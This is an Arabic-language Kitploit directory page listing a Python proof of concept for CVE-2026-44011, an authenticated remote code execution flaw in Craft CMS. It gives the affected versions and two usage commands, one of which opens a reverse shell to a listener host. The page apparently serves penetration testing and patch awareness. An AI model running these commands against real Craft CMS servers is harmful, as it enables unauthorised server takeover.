Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-44011-poc — PoC لتنفيذ التعليمات البرمجية عن بُعد (RCE) في Craft CMS بعد المصادقة للثغرة CVE-2026-44011 | Kitploit
أدوات/GitHubGitHub/dennisdgr/cve-2026-44011-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubdennisdgr/cve-2026-44011-poc

CVE-2026-44011-poc

PoC لتنفيذ التعليمات البرمجية عن بُعد (RCE) في Craft CMS بعد المصادقة للثغرة CVE-2026-44011

عرض المستودع
4منذ 3 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-44011: استغلال RCE الموثّق في Craft CMS (إثبات مفهوم)

يقوم هذا السكربت المكتوب بلغة Python بتكييف الهجوم الموصوف في التنبيه الأمني الخاص بـ Craft CMS. يمكن لمستخدم Craft موثّق الوصول إلى مسار تكوين تخطيط الحقول المصاب بثغرة، والتسبب في تنفيذ الخادم للأوامر.

النطاق والمتطلبات

الإصدارات المتأثرة هي Craft CMS >=4.0.0, <4.17.12 و >=5.0.0, <5.9.18.

يتطلب السكربت وجود curl على كلا المضيفين. ويستخدم Bash على الخادم. كما يوفّر Python3 على الخادم طرفية تفاعلية PTY؛ وبدونه، تعود الصدفة إلى اتصال أساسي.

الاستخدام

# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check

# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'

الفضل

تنسب Craft CMS الفضل إلى @precicom-vincent-tl بصفته مكتشف CVE-2026-44011. وقد نُشرت تفاصيل الثغرة ومثال الحمولة في التنبيه الأمني الخاص بـ Craft CMS GHSA-qrgm-p9w5-rrfw. ويقوم هذا السكربت بتكييف تلك التقنية المنشورة.

تنزيل الأداة